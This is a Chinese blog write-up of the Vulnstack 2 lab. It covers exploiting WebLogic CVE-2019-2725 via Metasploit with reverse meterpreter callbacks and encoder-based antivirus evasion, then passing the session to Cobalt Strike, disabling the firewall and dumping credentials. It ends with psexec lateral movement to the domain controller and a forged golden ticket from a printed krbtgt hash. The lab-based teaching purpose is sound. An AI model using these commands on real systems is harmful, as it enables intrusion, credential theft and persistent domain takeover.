当前位置: 首页 > news >正文

ATTCK实战系列-Vulnstack靶场内网域渗透(二)

ATT&CK实战系列-Vulnstack靶场内网域渗透(二)

  • 前言
  • 一、环境搭建
    • 1.1 靶场下载地址
    • 1.2 环境配置
      • 1.2.1 DC域控服务器:
      • 1.2.2 WEB服务器:
      • 1.2.3 PC域内主机:
      • 1.2.4 攻击者kali:
    • 1.3 靶场拓扑图
  • 二、外网渗透
    • 2.1 信息收集
    • 2.2 Weblogic 10.3.6.0
      • 2.2.1 漏洞利用
      • 2.2.2 MSF派生会话给CS
  • 三、内网渗透
    • 3.1 本机信息收集
    • 3.2 域内信息收集
  • 四、内网渗透
    • 4.1 psexec 传递
    • 4.2 横向移动
    • 4.3 权限维持
    • 4.4 黄金票据

前言

本次靶场环境主要包括Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。1.Bypass UAC
2.Windows系统NTLM获取
3.Access Token利用(MSSQL利用)
4.WMI利用
5.网页代理,二层代理,特殊协议代理
6.域内信息收集
7.域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
8.域凭证收集
9.后门技术(黄金票据、白银票据、Sid History、MOF)

一、环境搭建

1.1 靶场下载地址

靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
默认密码:1qaz@WSX

1.2 环境配置

下载好靶机打开vmx文件即可,将外网网段设置为192.168.111.0/24,其他设置都默认。

在这里插入图片描述

1.2.1 DC域控服务器:

• 内网IP:10.10.10.10
• 系统:Windows Server 2012(64位)
• 用户名:de1ay

1.2.2 WEB服务器:

注意:(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去)

•模拟外网IP:192.168.111.80
•内网IP:10.10.10.80
•系统:Windows Server 2008(64位)

启动后在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理,使用管理员身份运行即可。

接下来的操作遇到这个界面就管理员身份运行它即可,管理员账号密码均为:Administrator/1qaz@WSX

在这里插入图片描述

在这里插入图片描述
然后点击计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动

在这里插入图片描述

1.2.3 PC域内主机:

•模拟外网IP:192.168.111.201
•内网IP:10.10.10.201
•系统:Windows 7(32位)

点击计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动

在这里插入图片描述

1.2.4 攻击者kali:

•模拟外网IP:192.168.111.128
•系统:linux

1.3 靶场拓扑图

在这里插入图片描述

二、外网渗透

2.1 信息收集

已知Web服务器的公网IP为192.168.111.80,所以,我们先对其Web服务器进行端口扫描:

nmap -T4 -sC -sV 192.168.111.80

在这里插入图片描述
端口扫描结果得知:

  • 445端口开放可能存在smb服务可能还会有ms17-010 端口溢出漏洞
  • 139端口开放就存在有samba服务可能会有远程命令执行漏洞
  • 1433端口开放就存在mssql服务有可能存在爆破 注入 sa弱口令
  • 3389远程桌面服务 7001端口 weblogic服务

我们先从7001端口上的Weblogic下手。

2.2 Weblogic 10.3.6.0

在这里插入图片描述
直接使用 WeblogicScan 扫描一下可能存在的漏洞,工具地址: https://github.com/rabbitmask/WeblogicScan

命令:python WeblogicScan.py -u 192.168.111.80 -p 7001

在这里插入图片描述

2.2.1 漏洞利用

存在的漏洞先试试CVE-2019-2725,我们在metasploit上找到了该漏洞的利用模块

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
set target Windows
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.111.80   #靶机ip
set lhost 192.168.111.128   #攻击者kali ip
setg EnableStageEncoding true   #编码绕过
setg StageEncoder x64/zutto_dekiru  # 进行编码
exploit

在这里插入图片描述
该模块所携带的payload是针对unix环境,所以设置为windows环境
在这里插入图片描述
执行后,成功返回meterpreter,并且为管理员权限。

这里我们做编码的目的是为了绕过360,也可以使用一些其它免杀的方式,这里使用的msf的自免杀,使用x64/zutto_dekiru编码绕过。

2.2.2 MSF派生会话给CS

为了方便后面的渗透,我这里也给Cobaltstrike派生了一个shell:

首先CS创建监听器
在这里插入图片描述

background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.128   
set lport 9999
set session 3
exploit

在这里插入图片描述
CS成功上线!
在这里插入图片描述
在这里插入图片描述

三、内网渗透

3.1 本机信息收集

拿到了目标Web服务器的权限后,我们开始对目标主机及其所在的网络环境进行信息收集。
抓取明文密码 logonpasswords
在这里插入图片描述

shell systeminfo    // 查看操作系统信息

在这里插入图片描述

shell ipconfig /all       // 查询本机IP段,所在域等

在这里插入图片描述
whoami // 查看当前用户、权限
net user // 查看本地用户
net localgroup administrators // 查看本地管理员组(通常包含域用户)
在这里插入图片描述

综上可知目标Web服务器主机的操作系统为Windows Server 2008,具有两个网卡分别连通192.168.111.1/24和10.10.10.1/24两个网段。

3.2 域内信息收集

查询域内用户 net user /domain #该命令在本环境中需要在system权限下执行
直接在CS上提权

首先关闭防火墙 netsh advfirewall set allprofiles state off

在这里插入图片描述

net view /domain       //查看有几个域  

在这里插入图片描述

net view                          // 查看域内主机   

在这里插入图片描述

net config workstation     // 查看当前计算机名,全名,用户名,系统版本,工作站域,登陆的域等

在这里插入图片描述

net group "domain computers" /domain      // 查看域内的机器

在这里插入图片描述

net user /domain                                        // 查看域用户
net group "domain controllers" /domain          // 查看域控制器组

在这里插入图片描述

net group "Enterprise Admins" /domain    // 查看域管理员组

在这里插入图片描述
从收集的信息可知,目标主机所在的网络存在域环境,域名为de1ay.com,存在两台域主机WEB和PC,域控制器为DC.de1ay.com,主机名为DC,域管理员为Administrator。

四、内网渗透

4.1 psexec 传递

psexec 是微软 pstools 工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。psexec 能够在命令行下在对方没有开启 telnet 服务的时候返回一个半交互的命令行,像 telnet 客户端一样。原理是基于IPC共享,所以要目标打开 445 端口。另外在启动这个 psexec 建立连接之后对方机器上会被安装一个服务。
获取凭据后对目标网段进行端口存活探测,因为是 psexec 传递登录,这里仅需探测445端口

命令:portscan ip网段 端口 扫描协议(arp、icmp、none) 线程
例如:portscan 10.10.10.0/24 445 arp 200

在这里插入图片描述
可看到域控机器DC开放了445端口

4.2 横向移动

利用 psexec 横向移动至DC,使域控成功上线。
新建监听器
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
DC成功上线!

在这里插入图片描述

4.3 权限维持

在域控获得KRBTGT账户NTLM密码哈希和SID

hashdump

在这里插入图片描述

logonpasswords

在这里插入图片描述
如上图所示,我们得到krbtgt用户的Hash为:82dfc71b72a11ef37d663047bc2088fb,
域sid为S-1-5-21-2756371121-2868759905-3853650604-1001

4.4 黄金票据

黄金票据是伪造票据授予票据(TGT),也被称为认证票据,TGT仅用于向域服务器上的密钥分配中心(KDC)证明用户已经被其他的域控制器认证

黄金票据的条件:

 1. 域名城 2. 域的sid值 3. 域的krbtgt账户htlm密码哈希 4. 伪造用户名

黄金票据可以在拥有普通域用户权限和krbtgt账户的hash的情况下用来获取域管理员权限,上面已经获取了域控的system权限了,还可以使用黄金票据做权限维持,当域控制器权限掉了之后,在通过域内其他任意机器伪造票据重新获取最高权限
在这里插入图片描述
将以上获取的信息填写到会话中

在这里插入图片描述
成功伪造

在这里插入图片描述
此时,攻击者就可以利用这台普通域用户的主机任意访问域控制器了,如下列出域控的C盘目录:

dir \\DC\c$

在这里插入图片描述


http://www.mrgr.cn/news/35501.html

相关文章:

  • Scaling Laws终结,量化无用,AI大佬都在审视这篇论文
  • 微信小程序——实现二维码扫描功能(含代码)
  • AI 大模型应用:AI开发的捷径工作流模式
  • golang使用etcd版本问题
  • ubontu--cuDNN安装
  • Mybatis Plus 集成 PgSQL 指南
  • [docker][软件]docker快速安装rabbitmq
  • 每日一练:二叉树的层序遍历
  • 并发编程。
  • 【学习复盘】相关资料
  • QT 自定义可拖动缩放的无边框窗口,可用于mainmindow, widget
  • WebGL性能分析与优化
  • 24/9/24 算法笔记 超参数优化算法
  • QT客户端发送HTTP请求此时服务器到底收到了哪些数据?
  • 解决Mac 默认设置 wps不能双面打印的问题
  • yum库 docker的小白安装教程(附部分问题及其解决方案)
  • 翻译:openmax文档
  • 从 Oracle 集群到单节点环境(详细记录一次数据迁移过程)之一:生产环境与目标服务器详情
  • 今日指数项目之大盘指数功能实现
  • 每日算法1(快慢指针)
  • nginx如何拦截未经授权的跳转
  • BUUCTF [SCTF2019]电单车详解两种方法(python实现绝对原创)
  • Codeforces Global Round 19 D题 Yet Another Minimization Problem(推式子,01背包变形)
  • 模拟哈希表
  • LVGL第一篇-了解lvgl显示原理以及使用C++移植
  • Zookeeper